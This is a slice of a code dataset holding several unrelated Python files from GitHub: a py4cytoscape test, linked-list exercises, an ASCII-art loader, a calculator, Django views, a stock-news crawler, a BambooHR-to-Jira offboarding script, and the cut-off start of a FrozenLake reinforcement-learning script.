['shared name', 'name', 'jumble backward', 'String']],\n title='networks mapped')\n check_merge(res, 'networks mapped', 9, 10,\n extra_network_props={'jumble forward': 'String', 'jumble backward': 'String'})\n\n # It would be very reasonable to add more tests for the nodes_only, edge_keys, node_keys, and in_network_merge\n # parameters, but I can't get a good definition of what these parameters do, so I don't know what to test for. So,\n # for now, we pass them on and hope for the best.\n\n # For the operation='difference' parameter, the best test would be to execute a merge that corresponds to the\n # GUI's \"Remove all nodes that are in the 2nd network\". 
I don't think the parameter for this is exposed, so\n # I have to punt on checking the 'difference' operation.\n\n # Verify that an intersection leaves only the single node 'node X'\n res = merge_networks(['Network_0', 'Network_1'], operation='intersection', title='Cool Intersection')\n check_merge(res, 'Cool Intersection', node_count=1, edge_count=0, merged_nodes={'node X'}, merged_edges={})\n\n # Verify that exception is thrown for bad cases\n self.assertRaises(CyError, merge_networks, [])\n self.assertRaises(CyError, merge_networks, None)\n\n @print_entry_exit\n def test_import_file_from_url(self):\n _TEST_SANDBOX_NAME = 'test_sandbox'\n _TEST_FILE = 'test file'\n _ALTTEST_SANDBOX_NAME = '.test.sandbox'\n _FROM_URL = 'https://www.dropbox.com/s/r15azh0xb53smu1/GDS112_full.soft?dl=0'\n _FROM_URL_BYTES = 5536880\n _ALT_FROM_URL = 'https://www.dropbox.com/s/8wc8o897tsxewt1/BIOGRID-ORGANISM-Saccharomyces_cerevisiae-3.2.105.mitab?dl=0'\n _ALT_FROM_URL_BYTES = 166981992\n _NESTED_DIR = '1/2/3/'\n _ESCAPE_DIR = '1/../1/2/3/'\n\n def check_url_to_result(res, sandbox_path, file_name, expected_length):\n self.assertIsInstance(res, dict)\n self.assertSetEqual(set(res.keys()), {'filePath', 'fileByteCount'})\n expected_file = os.path.join(sandbox_path, file_name)\n self.assertTrue(os.path.samefile(res['filePath'], expected_file))\n self.assertTrue(os.path.exists(expected_file))\n self.assertEqual(os.path.getsize(res['filePath']), expected_length)\n\n def check_url_to_local_dir(sandbox_path):\n # Get rid of the local test file if it already exists\n if os.path.exists(_TEST_FILE):\n os.remove(_TEST_FILE)\n\n # Verify that a file can be transferred to the sandbox\n res = import_file_from_url(_FROM_URL, _TEST_FILE)\n check_url_to_result(res, sandbox_path, _TEST_FILE, _FROM_URL_BYTES)\n\n # Verify that the file can't be overwritten if we don't want it to be\n self.assertRaises(CyError, import_file_from_url, source_url=_ALT_FROM_URL, dest_file=_TEST_FILE,\n overwrite=False)\n check_url_to_result(res, sandbox_path, _TEST_FILE, _FROM_URL_BYTES)\n\n # Verify that a different file can overwrite it if we allow it\n res = import_file_from_url(_ALT_FROM_URL, _TEST_FILE)\n check_url_to_result(res, sandbox_path, _TEST_FILE, _ALT_FROM_URL_BYTES)\n\n # Get rid of the local test file if it already exists\n if os.path.exists(_TEST_FILE):\n os.remove(_TEST_FILE)\n\n # Verify that a file can be written to a directory nested in the sandbox, with path to be created during write\n nested_test_file = _NESTED_DIR + _TEST_FILE\n res = import_file_from_url(_FROM_URL, nested_test_file)\n check_url_to_result(res, sandbox_path, nested_test_file, _FROM_URL_BYTES)\n if os.path.exists(nested_test_file):\n os.remove(nested_test_file)\n\n # Verify that a file can be written to a directory nested in the sandbox, with path to be created during write\n escaped_test_file = _ESCAPE_DIR + _TEST_FILE\n res = import_file_from_url(_FROM_URL, escaped_test_file)\n check_url_to_result(res, sandbox_path, escaped_test_file, _FROM_URL_BYTES)\n if os.path.exists(escaped_test_file):\n os.remove(escaped_test_file)\n\n # Verify that trying to send a non-existent file fails\n self.assertRaises(Exception, import_file_from_url, source_url=_FROM_URL)\n self.assertRaises(CyError, import_file_from_url, source_url='totally bogus', dest_file=_TEST_FILE)\n self.assertRaises(CyError, import_file_from_url, source_url=None, dest_file=_TEST_FILE)\n self.assertRaises(CyError, import_file_from_url, source_url=' ', dest_file=_TEST_FILE)\n\n # Check sending to empty 
sandbox (Python kernel directory)\n default_sandbox_path = sandbox_set(None) # Should be py4cytoscape test directory\n self.assertTrue(os.path.samefile(default_sandbox_path, os.getcwd()))\n check_url_to_local_dir(default_sandbox_path)\n\n def _cybrowser_windows(self, operation='show'):\n\n def check_browser_list(browser_list, expected_list): # doesn't support duplicate ID keys\n browser = {b['id']: b for b in browser_list}\n expected = {b['id']: b for b in expected_list}\n self.assertEqual(len(browser), len(expected))\n for id, val in browser.items():\n self.assertIn(id, expected)\n self.assertEqual(val['title'], expected[id][operation]['title'])\n\n # Verify that the browser list starts out empty ... no browser windows displayed\n check_browser_list(cybrowser_list(), [])\n\n # Verify that a browser can be launched with all of its options\n self._check_show(operation, ToolsTests.BROWSER_HELLO)\n self._check_show(operation, ToolsTests.CYTOSCAPE_HOME_PAGE)\n self._check_show(operation, ToolsTests.CYTOSCAPE_MANUAL)\n\n # Verify that the browser list contains all of the new pages\n time.sleep(2) # wait for windowing system to catch up\n check_browser_list(cybrowser_list(),\n [ToolsTests.BROWSER_HELLO, ToolsTests.CYTOSCAPE_HOME_PAGE, ToolsTests.CYTOSCAPE_MANUAL])\n\n # Verify that adding the same pages doesn't change the browser list\n self._check_show(operation, ToolsTests.BROWSER_HELLO, skip_verify=True)\n self._check_show(operation, ToolsTests.BROWSER_HELLO, skip_verify=True)\n self._check_show(operation, ToolsTests.BROWSER_HELLO, skip_verify=True)\n time.sleep(2) # wait for windowing system to catch up\n check_browser_list(cybrowser_list(),\n [ToolsTests.BROWSER_HELLO, ToolsTests.CYTOSCAPE_HOME_PAGE, ToolsTests.CYTOSCAPE_MANUAL])\n\n # Verify that hiding a browser removes it from the browser list, and bogus browser windows don't cause error\n self.assertDictEqual(cybrowser_hide(ToolsTests.BROWSER_HELLO['id']), {})\n self.assertDictEqual(cybrowser_close(ToolsTests.CYTOSCAPE_HOME_PAGE['id']), {})\n time.sleep(2) # wait for windowing system to catch up\n check_browser_list(cybrowser_list(), [ToolsTests.CYTOSCAPE_MANUAL, ToolsTests.BROWSER_HELLO])\n\n # Verify that closing a browser twice does no harm\n self.assertDictEqual(cybrowser_close(ToolsTests.CYTOSCAPE_HOME_PAGE['id']), {})\n time.sleep(2) # wait for windowing system to catch up\n check_browser_list(cybrowser_list(), [ToolsTests.CYTOSCAPE_MANUAL, ToolsTests.BROWSER_HELLO])\n\n # Verify that closing the last browser window results in a clean browser list\n self.assertDictEqual(cybrowser_close(ToolsTests.BROWSER_HELLO['id']), {})\n self.assertDictEqual(cybrowser_close(ToolsTests.CYTOSCAPE_MANUAL['id']), {})\n time.sleep(2) # wait for windowing system to catch up\n check_browser_list(cybrowser_list(), [])\n\n def _check_show(self, operation, window_def, skip_verify=False):\n show_result = window_def[operation]['func'](window_def['id'], window_def[operation]['title'])\n self.assertIsInstance(show_result, dict)\n self.assertEqual(show_result['id'], window_def['id'])\n if not skip_verify: input('Verify that the \"' + window_def[operation]['title'] + '\" is visible; hit Enter')\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"cytoscape/py4cytoscape","sub_path":"tests/test_tools.py","file_name":"test_tools.py","file_ext":"py","file_size_in_byte":23705,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"3"} +{"seq_id":"43371693869","text":"# from LinkedList import LinkedList\n\n# def 
nthToLast(ll,n):\n# pointer1 = ll.head\n# pointer2 = ll.head\n#\n# for i in range(n):\n# if pointer2 is None:\n# return None\n# pointer2 = pointer2.next\n# while pointer2:\n# pointer1 = pointer1.next\n# pointer2 = pointer2.next\n# return pointer1\n#\n# customLL=LinkedList()\n# customLL.generate(10,0,99)\n# print(customLL)\n# print(nthToLast(customLL,3))\n\n\n\n\n\n\n\n\n# #### PARTITION QN\n#\n#\n# def partition(ll,x):\n# curNode = ll.head\n# ll.tail = ll.head\n#\n# while curNode:\n# nextNode = curNode.next\n# curNode.next = None\n# if curNode.value < x:\n# curNode.next = ll.head\n# ll.head = curNode\n# else:\n# ll.tail.next = curNode\n# ll.tail = curNode\n# curNode = nextNode\n#\n# if ll.tail.next is not None:\n# ll.tail.next = None\n#\n# customLL = LinkedList()\n# customLL.generate(10,0,99)\n# print(customLL)\n# partition(customLL,10)\n# print(customLL)\n\n\n\n\n\n\n\n\n# #### SUM LINKED LISTS\n#\n#\n# def sumList(llA,llB):\n# n1 = llA.head\n# n2 = llB.head\n# carry = 0\n# ll = LinkedList()\n#\n# while n1 or n2 :\n# result = carry\n# if n1:\n# result += n1.value\n# n1 = n1.next\n# if n2:\n# result += n2.value\n# n2 = n2.next\n# ll.add(int(result % 10))\n# carry = result / 10\n#\n# return ll\n#\n# llA = LinkedList()\n# llA.add(7)\n# llA.add(1)\n# llA.add(6)\n#\n# llB = LinkedList()\n# llB.add(5)\n# llB.add(9)\n# llB.add(2)\n#\n# print(llA)\n# print(llB)\n# print(sumList(llA,llB))\n\n\n\n\n\n\n####### INTERSECTION\n\n\nfrom LinkedList import LinkedList,Node\ndef intersection(llA,llB):\n if llA.tail is not llB.tail:\n return False\n lenA = len(llA)\n lenB = len(llB)\n\n short = llA if lenA < lenB else llB\n long = llA if lenA > lenB else llB\n\n diff = len(long) - len(short)\n longNode = long.head\n shortNode = short.head\n\n for i in range(diff):\n longNode = longNode.next\n while shortNode is not longNode:\n shortNode = shortNode.next\n longNode = longNode.next\n return longNode\n\n#### helper func add method\ndef addSameNode(llA,llB,value):\n tempNode = Node(value)\n llA.tail.next = tempNode\n llA.tail = tempNode\n llB.tail.next = tempNode\n llB.tail = tempNode\n\nllA = LinkedList()\nllA.generate(3,0,10)\n\nllB = LinkedList()\nllB.generate(4,0,10)\n\naddSameNode(llA,llB,11)\naddSameNode(llA,llB,14)\n\nprint(llA)\nprint(llB)\n\nprint(intersection(llA,llB))","repo_name":"Gowtham-S01/python","sub_path":"newone/ReurnNthFromLast.py","file_name":"ReurnNthFromLast.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"41976318243","text":"if __name__ == '__main__':\n import sys, os\n \n nombre_archivos = os.listdir('ascii')\n\n for nombre_archivo in nombre_archivos:\n nombre_ascii = nombre_archivo[:-4]\n print(nombre_ascii)\n\n sys.exit()\n\nimport os\nfrom parametros import __ASCII__\n\nclass Ascii:\n def __init__(self, nombre, simbolo = '.'):\n self.nombre = nombre\n self.archivo = f'{self.nombre}.txt'\n self.simbolo = simbolo\n self.contenido = self.obtener_ascii()\n\n def obtener_ascii(self)-> list:\n asc = []\n with open(__ASCII__ + self.archivo) as f:\n lineas = f.readlines()\n for linea in lineas:\n asc.append(linea.rstrip())\n\n return asc\n\n\n def espaciar_ascii(self):\n ascii_nuevo = []\n for linea in self.contenido:\n linea_m = list(linea)\n if linea_m and linea_m[0] == ' ':\n linea_m[0] = self.simbolo\n linea = ''.join(linea_m)\n ascii_nuevo.append(linea)\n \n self.contenido = ascii_nuevo\n\n\n @staticmethod\n def obtener_asciis() -> dict:\n '''\n Obtengo los asciis disponibles para el macro, en formato de 
diccionario\n {nombre_ascii => Ascii}\n '''\n asciis = dict()\n\n nombre_archivos = os.listdir(__ASCII__)\n\n for nombre_archivo in nombre_archivos:\n nombre_ascii = nombre_archivo[:-4]\n asc = Ascii(nombre_ascii)\n\n asciis[nombre_ascii] = asc\n\n return asciis","repo_name":"Jeremiah-PHP6/Jeremiah-PHP6","sub_path":"Lol spammer/entidades/asc.py","file_name":"asc.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30304585786","text":"def suma(a, b):\n\treturn a + b\n\ndef resta(a, b):\n\treturn a - b\n\ndef multiplicacion(a, b):\n\treturn a * b\n\ndef division(a, b):\n if (b == 0):\n return print(\"No se puede dividir por cero!\")\n else:\n return a / b\n\ndef run():\n tipos = \"1) Sumar dos numeros \\n2) Restar dos numeros \\n3) Multiplicar dos numeros \\n4) Dividir dos numeros \\n5) Terminar\"\n opcion = int(input(\"\\n Seleccione el numero de la opcion a consultar: \\n{}:\\n\".format(tipos)))\n if opcion == 1: \n n1 = int(input(\"Digite el primer numero: \"))\n n2 = int(input(\"Digite el segundo numero: \"))\n print(\"El resultado de la suma es: \", suma(n1, n2))\n elif opcion == 2:\n n1 = int(input(\"Digite el primer numero: \"))\n n2 = int(input(\"Digite el segundo numero: \"))\n print(\"El resultado de la resta es: \", resta(n1, n2))\n elif opcion == 3:\n n1 = int(input(\"Digite el primer numero: \"))\n n2 = int(input(\"Digite el segundo numero: \"))\n print(\"El resultado de la multiplicacion es: \", multiplicacion(n1, n2))\n elif opcion == 4:\n n1 = int(input(\"Digite el primer numero: \"))\n n2 = int(input(\"Digite el segundo numero: \"))\n print(\"El resultado de la division es: \", division(n1, n2)) \n elif opcion == 5:\n exit()\n else:\n print(\"Opcion no valida, vuelva a digitar una opcion\")\n\n\ndef main():\n print(\"*** Calculadora basica ***\")\n run()\n \nif __name__ == \"__main__\":\n main()\n","repo_name":"devsantoss/CalculadoraFIS","sub_path":"calculadora/calculadora.py","file_name":"calculadora.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"1333847906","text":"from itertools import groupby\n\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse\nfrom django.views.decorators.http import require_POST\n\nfrom apps.administration.models import ActionLog\nfrom apps.pilots.models import Scenery\nfrom zhuartcc.decorators import require_staff\n\n\ndef view_artcc_map(request):\n return render(request, 'artcc_map.html', {'page_title': 'ARTCC Map'})\n\n\ndef view_scenery(request):\n sceneries = Scenery.objects.all().order_by('simulator')\n scenery_sorted = {k: list(g) for k, g in groupby(sceneries, key=lambda scenery: scenery.get_simulator_display())}\n simulators = Scenery._meta.get_field('simulator').choices\n return render(request, 'scenery.html', {\n 'page_title': 'Scenery',\n 'sceneries': scenery_sorted,\n 'simulators': simulators\n })\n\n\n@require_staff\n@require_POST\ndef add_scenery(request):\n scenery = Scenery(\n name=request.POST.get('name'),\n simulator=request.POST.get('simulator'),\n link=request.POST.get('link'),\n payware=True if 'payware' in request.POST else False\n )\n scenery.save()\n\n ActionLog(action=f'Scenery \"{scenery.name}\" created by {request.user_obj}.').save()\n\n return redirect(reverse('scenery'))\n\n\n@require_staff\n@require_POST\ndef edit_scenery(request, scenery_id):\n 
scenery = Scenery.objects.get(id=scenery_id)\n scenery.name = request.POST.get('name')\n scenery.simulator = request.POST.get('simulator')\n scenery.link = request.POST.get('link')\n scenery.payware = True if 'payware' in request.POST else False\n scenery.save()\n\n ActionLog(action=f'Scenery \"{scenery.name}\" modified by {request.user_obj}.').save()\n\n return redirect(reverse('scenery'))\n\n\n@require_staff\n@require_POST\ndef delete_scenery(request, scenery_id):\n scenery = Scenery.objects.get(id=scenery_id)\n\n ActionLog(action=f'Scenery \"{scenery.name}\" deleted by {request.user_obj}.').save()\n\n scenery.delete()\n\n return HttpResponse(status=200)\n","repo_name":"Houston-ARTCC/zhuartcc.org","sub_path":"apps/pilots/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"} +{"seq_id":"42111038662","text":"\"\"\"container-loading-problem - constants.py\n---- AUTHOR: Ivan STEPANIAN (iv-stpn )\n---- ROLE: Defines the global constants the program uses\n\"\"\"\n\nfrom itertools import permutations\n\n# Number of dimensions for the coordinate system used throughout the code base.\nDIMS = 3\n\n# Possible permutations of the coordinates of a rectangular prism.\n# Maps coordinates (0, 1, 2) = (x, y, z) to the corresponding permutation.\n# (e.g. PERMUTATIONS[2] = (1, 0, 2) <=> (0, 1, 2) => (1, 0, 2) <=> (x, y, z) => (y, x, z) rotation)\nPERMUTATIONS = tuple(permutations(range(DIMS)))\n\n# Where to place the first package during the Three Corners Heuristic algorithm\n# Initially set to (0, 0, 0)\nINIT_COORDS = tuple(0 for _ in range(DIMS))\n\n# Limit of the number of types of packages that can be placed in the container\n# Limits the number of permutations of the package types (10 types => 10! 
= 3628800 possibilities)\nTYPE_LIMIT = 10\n\n# Regions of the container where packages cannot be placed, list of (min_coords, max_coords) pairs\nCONSTRAINTS = [\n ((0, 0, 254), (16.5, 9, 268.5)),\n ((0, 224.5, 254), (16.5, 233.5, 268.5)),\n]\n","repo_name":"iv-stpn/container-loading-problem","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29615348511","text":"# -*- coding: utf-8 -*-\n# @Author: LQS\n# @Date: 2021-07-18 15:49:28\n# @Last Modified by: LQS\n# @Last Modified time: 2021-08-05 21:12:57\nimport requests, re, datetime\nfrom bs4 import BeautifulSoup\nfrom pymongo import MongoClient\nfrom textProcessing.processingArticle import processArticle as pA\n\nimport gevent\nfrom gevent import monkey\nmonkey.patch_all()\nclass jrjStockCrawler(object):\n '''\n # Arguments:\n totalPages: Number of pages set to be crawled.\n Range: Divide total web pages into totalPages/Range parts \n for multi-threading processing.\n ThreadsNum: Number of threads needed to be start.\n dbName: Name of database.\n colName: Name of collection.\n IP: Local IP address.\n PORT: Port number corresponding to IP address.\n '''\n def __init__(self, *arg, **kwarg):\n super(jrjStockCrawler, self).__init__()\n self.startDate = arg[0]\n self.endDate = arg[1]\n self.Range = arg[2]\n self.ThreadsNum = kwarg['ThreadsNum']\n self.IP = kwarg['IP']\n self.PORT = kwarg['PORT']\n self.dbName = kwarg['dbName']\n self.colName = kwarg['_collectionName']\n\n def ConnDB(self):\n '''\n Connect to mongodb datebase\n '''\n #创建游标,指定数据库,最后指定集合\n Client = MongoClient(self.IP, self.PORT)\n db = Client[self.dbName]\n self._collection = db[self.colName]\n\n def extractDate(self, tagList:list)->list:\n '''Extract column date(the tag in tagList) into a list'''\n data = []\n for tag in tagList:\n res = self._collection.distinct(str(tag))\n data.append(res)\n return data\n\n def getEveryDay(self, startDate:str, endDate:str)->list:\n dateList = []\n dateFormat = '%Y-%m-%d'\n startDate = datetime.datetime.strptime(startDate, dateFormat)\n endDate = datetime.datetime.strptime(endDate, dateFormat)\n while startDate <= endDate:\n dateList.append(startDate.strftime(dateFormat))\n startDate += datetime.timedelta(days = 1)\n return dateList\n\n def getDateList(self)->list:\n '''\n Divide date list into parts using 'self.Range' parameter.\n '''\n dateList = self.getEveryDay(self.startDate, self.endDate)\n dateNums = len(dateList)\n k = 0\n dateRangeList = []\n\n while k < dateNums:\n if k + self.Range >= dateNums:\n break\n else:\n dateRangeList.append(dateList[k:k+self.Range])\n k += self.Range\n dateRangeList.append(dateList[k:])\n return dateRangeList\n\n def findPageNums(self, url:str, date:str)-> int:\n '''Find the number of web pages of specific date.\n '''\n resp = requests.get(url)\n bs = BeautifulSoup(resp.text, 'lxml')\n pages = 1\n a_list = bs.find_all('a', href=re.compile(date.replace('-', '')+'_'), target='_self', text=True)\n if a_list:\n pages = len(a_list)\n return pages\n\n\n\n def getUrlInfo_fromjrj(self, url:str, date_specific:str):\n '''get date and article from a specific web.\n '''\n resp = requests.get(url)\n bs = BeautifulSoup(resp.text, 'lxml')\n date = ''\n article = ''\n #notFoundPage = False\n #start get special date from a special website\n spans = bs.find_all('span')\n for span in spans:\n for child in span.children:\n if child == 'jrj_final_date_start':\n date = 
span.text.replace('\r', '').replace('\n', '')\n break\n if date:\n break\n if not date:\n date = date_specific\n\n #start get article\n article_bs = bs.find('div', class_='texttit_m1')\n if article_bs:\n article = pA.processArticle().jrj_own(article_bs.text)\n \n return (date, article)\n\n def getCompNews_jrj(self, dateList:list):\n '''\n Crawl company news from target web\n (http://stock.jrj.com.cn/xwk/)\n '''\n self.ConnDB()\n AddressList = self.extractDate(['Address'])[0]\n if not AddressList:\n url_body = 'http://stock.jrj.com.cn/xwk/'\n url_diffPages = '_1.shtml'\n urls_date = []\n\n for date in dateList:\n url_complete = url_body + date.replace('-', '')[0:6] +\\\n '/' + date.replace('-', '') + url_diffPages\n pageNums = self.findPageNums(url_complete, date)\n for page in range(1, pageNums+1):\n url_sheet_cur = url_body + date.replace('-', '')[0:6] +\\\n '/'+ date.replace('-', '') + '_{}.shtml'.format(page)\n '''\n url_sheet_cur = urls_date.append(url_body + date.replace('-', '')[0:6] +\\\n '/'+ date.replace('-', '') + '_{}.shtml'.format(page))\n '''\n urls_date.append((url_sheet_cur, date))\n\n for (url_specific, date_specific) in urls_date:\n print('ready to get Info from [{0}], the date is *{1}*'.format(url_specific, date_specific))\n resp = requests.get(url_specific)\n bs = BeautifulSoup(resp.text, 'lxml')\n a_list = bs.find_all('a', href=re.compile(r'http://stock\\.jrj\\.com\\.cn.*?(shtml)$'), text=True, target=None)\n for a in a_list:\n (date, article)= self.getUrlInfo_fromjrj(a['href'], date_specific)\n if article:\n data = {'Date': date,\n 'Address': a['href'],\n 'Title': a.text,\n 'Article': article}\n self._collection.insert_one(data)\n else:\n url_body = 'http://stock.jrj.com.cn/xwk/'\n url_diffPages = '_1.shtml'\n urls_date = []\n\n for date in dateList:\n url_complete = url_body + date.replace('-', '')[0:6] +\\\n '/' + date.replace('-', '') + url_diffPages\n pageNums = self.findPageNums(url_complete, date)\n for page in range(1, pageNums+1):\n url_sheet_cur = url_body + date.replace('-', '')[0:6] +\\\n '/'+ date.replace('-', '') + '_{}.shtml'.format(page)\n urls_date.append((url_sheet_cur, date))\n\n for url_specific, date_specific in urls_date:\n print('ready to get Info from [{0}], the date is *{1}*'.format(url_specific, date_specific))\n resp = requests.get(url_specific)\n bs = BeautifulSoup(resp.text, 'lxml')\n a_list = bs.find_all('a', href=re.compile(r'http://stock\\.jrj\\.com\\.cn.*?(shtml)$'), text=True, target=None)\n for a in a_list:\n if a['href'] not in AddressList:\n (date, article)= self.getUrlInfo_fromjrj(a['href'], date_specific)\n if article:\n data = {'Date': date,\n 'Address': a['href'],\n 'Title': a.text,\n 'Article': article}\n self._collection.insert_one(data)\n\n def getCmpNews_jrjToday(self):\n today = datetime.date.today()\n today = datetime.date.strftime(today, '%Y-%m-%d')\n self.getCompNews_jrj([today])\n\n def coroutine_run(self):\n '''\n Coroutines running\n '''\n jobs = []\n dateLists = self.getDateList()\n for dateList in dateLists:\n jobs.append(gevent.spawn(self.getCompNews_jrj, dateList))\n gevent.joinall(jobs)","repo_name":"miyagipipi/StockNewsCrawler","sub_path":"Crawlers/crawler_jrj.py","file_name":"crawler_jrj.py","file_ext":"py","file_size_in_byte":7871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27765411394","text":"import requests\nimport json\nfrom dotenv import load_dotenv\nfrom datetime import datetime, timedelta\nimport os\nload_dotenv()\n\n# 
Set up BambooHR API request parameters\nbamboo_api_key = os.getenv('BAMBOO_API_KEY')\nbamboo_subdomain = os.getenv('BAMBOO_SUBDOMAIN')\n\nprint(f'OS {os.getenv(\"BAMBOO_SUBDOMAIN\")}')\n# Set up API endpoint and API key\nendpoint = f'https://api.bamboohr.com/api/gateway.php/{bamboo_subdomain}/v1/'\n\n# Set up query parameters to retrieve data for new employees added since a certain date\n# Replace \"YYYY-MM-DD\" with actual date\nsince = '2023-01-01'\n\n# Set up Jira Service Desk API request parameters\njira_api_token = os.getenv('JIRA_API_TOKEN')\njira_url = os.getenv('JIRA_URL')\njira_customer_id = os.getenv('JIRA_CUSTOMER_ID') # ID of the Jira Service Desk customer who should be added to the request\nserviceDeskId = 2 # ID od the Jira Service Desk project\n\nparams = {'projectKey': 'EX', 'requestTypeId': 30, 'serviceDeskId': 2}\nheaders = {'Accept': 'application/json', 'Content-Type': 'application/json', 'Authorization': f'Basic {os.getenv(\"BAMBOO_AUTHORIZATION\")}'}\n\n#query_params = {'since': '2021-01-01', type: 'inserted'}\n\ndef setOffboardingDate(last_working_day):\n # Parse the string to a date\n date_string = last_working_day\n date = datetime.strptime(date_string, \"%Y-%m-%d\").date()\n\n # Increment the date by 1 day\n new_date = date + timedelta(days=1)\n\n # Print the new date in ISO format\n return new_date.isoformat()\n\n# Make API request to retrieve data for all employees that are recently terminated\ndef fetch_all_new_employees(since):\n date_since_last_sync = since\n url = endpoint + f'employees/changed?since={date_since_last_sync}T00%3A00%3A00-07%3A00&type=updated'\n response = requests.get(url, headers=headers)\n print(f'URL is {url}')\n print(f'Header is {headers}')\n data = response.json()\n\n #print(f'Recently terminated employees ${data}')\n\n employees = json.loads(response.content)['employees']\n\n # Loop through employee directory for newly created employees \n for key, value in employees.items():\n employee_id = key\n employee_details_url = endpoint + f\"employees/{employee_id}/?fields=firstName%2ClastName%2CjobTitle%2CbestEmail%2ChireDate%2CjobTitle%2CemploymentHistoryStatus%2CterminationDate%2Csupervisor%2CterminationDate%2Cstatus%2Clocation%2Cdepartment&onlyCurrent=true\"\n\n # Fetch Employee Details\n employee_details_response = requests.get(employee_details_url, headers=headers)\n\n # Parse the response to json. 
\n employee_details_data = employee_details_response.json()\n #print(employee_details_data)\n if employee_details_data[\"employmentHistoryStatus\"] == \"Terminated\" and employee_details_data[\"terminationDate\"] !=\"\":\n #print(employee_details_data[\"terminationDate\"])\n create_jira_onboarding_request(employee_details_data)\n\n #return(employee_details_data)\n\n# Loop through employee data and create Jira Service Desk customer requests\ndef create_jira_onboarding_request(employee_details_data):\n\n #for key, value in employee_details_data.items():\n # Construct Jira Service Desk API request payload\n payload = {\n# Kelechi to please be offboarded on 12 Dec\n 'serviceDeskId': params['serviceDeskId'],\n 'requestTypeId': params['requestTypeId'],\n 'requestFieldValues': {'summary': f'{employee_details_data[\"firstName\"]} {employee_details_data[\"lastName\"]} to be offboarded on {setOffboardingDate(employee_details_data[\"terminationDate\"])}',\n 'description': f'Email: {employee_details_data[\"bestEmail\"]}\\nDepartment: {employee_details_data[\"department\"]}\\nJob Title: {employee_details_data[\"jobTitle\"]}\\nLast Working Date: {setOffboardingDate(employee_details_data[\"terminationDate\"])}\\nManager: {employee_details_data[\"supervisor\"]}\\nLocation: {employee_details_data[\"location\"]}'\n }\n #'requestParticipants': [{'id': jira_customer_id}] \n }\n\n # Send Jira Service Desk API request to create new customer request\n headers = {'Accept': 'application/json', 'Content-Type': 'application/json', 'Authorization': f'Basic {os.getenv(\"JIRA_AUTHORIZATION\")}'}\n \n print(f'final jira url = {jira_url}')\n print(f'headers are: {headers}')\n\n response = requests.post(f'{jira_url}', headers=headers, json=payload)\n if response.status_code == 201:\n print(f'Customer request created for {employee_details_data[\"firstName\"]} {employee_details_data[\"lastName\"]}')\n else:\n print(f'Error creating customer request for {employee_details_data[\"firstName\"]} {employee_details_data[\"lastName\"]}: {response.content}')\n\n\n# Call the fetch_all_new_employees method passing in a last since sync date.\nget_new_employees = fetch_all_new_employees('2023-03-10')\n","repo_name":"AdeoluAdeyemi/bamboohr-jira-integration","sub_path":"offboard_ex_employee_jira_request.py","file_name":"offboard_ex_employee_jira_request.py","file_ext":"py","file_size_in_byte":4813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71344692880","text":"# Taken from : https://github.com/Urinx/ReinforcementLearning/blob/master/QLearning/QLearning_FrozenLake.py\n\nimport numpy as np\nimport gym\nimport random\nfrom pathlib import Path\nimport datetime\nimport time\nimport pickle\n\nfrom gym.envs.toy_text.frozen_lake import generate_random_map\n\n\"\"\"LOGGING\"\"\"\ntimestamp = int(time.time())\ntimestr = str(datetime.datetime.now().strftime('%Y-%m-%d_%H-%M'))\nexperiment_dir = Path('./data/')\nexperiment_dir.mkdir(exist_ok=True)\nexperiment_dir = experiment_dir.joinpath('MC/')\nexperiment_dir.mkdir(exist_ok=True)\nexperiment_dir = experiment_dir.joinpath(str(timestamp))\nexperiment_dir.mkdir(exist_ok=True)\n\n\"\"\"ENVIRONMENT\"\"\"\n\nDEFAULT = True # True for Default settings; False for custom map and custom size\nMAP_LOAD_BOOL = False\n\n# env = gym.make('FrozenLake-v1',is_slippery=False, \n# desc=generate_random_map(size=10),render_mode=\"human\" )\nif MAP_LOAD_BOOL == False:\n\n\n SIZE = 4\n\n if (DEFAULT == False) or (SIZE != 4) :\n 
\n        map_desc = generate_random_map(size=SIZE)\n        env = gym.make('FrozenLake-v1',\n                       is_slippery=False, \n                       desc=map_desc)\n        with open(str(experiment_dir)+'\\\\map_desc.pickle','wb') as h:\n            pickle.dump(map_desc,h)\n\n    else:\n        env = gym.make('FrozenLake-v1',\n                       is_slippery=False)\n                       # render_mode=\"human\" )\nelse:\n    try:\n        MAP_LOAD_DIR = 'data/QL/timestamp/map_desc.pickle'\n        with open(MAP_LOAD_DIR, 'rb') as f:\n            map_desc = pickle.load(f)\n        SIZE = len(map_desc)  # recover the grid size from the saved map\n        env = gym.make('FrozenLake-v1', is_slippery=False, desc=map_desc)\n    except:\n        print(\"Fail to load from saved map directory. Check directory given\")\n        exit()\n\ndef find_duplicates(sequence):\n    duplicates = {}\n    for i, state_action in enumerate(sequence):\n        key = str(state_action)\n        if key in duplicates:\n            duplicates[key].append(i)\n        else:\n            duplicates[key] = [i]\n    return duplicates\n\n\n\ndef possible_actions(state):\n    action_list = [0,1,2,3]\n    if state in NOLEFT:\n        action_list.remove(0)\n    if state in NODOWN:\n        action_list.remove(1)\n    if state in NORIGHT:\n        action_list.remove(2)\n    if state in NOUP:\n        action_list.remove(3)\n    return action_list\n\n\naction_size = env.action_space.n\nstate_size = env.observation_space.n\nqtable = np.zeros((state_size, action_size))\nntable = np.zeros((state_size, action_size)) # For bookkeeping only\n\n# Returns table: one list of sampled returns per (state, action) pair\nrtable = [[[] for i in range(action_size)] for j in range(state_size)]\n\n# Border masks: states from which a move off the grid is disallowed\n# (actions: 0 = left, 1 = down, 2 = 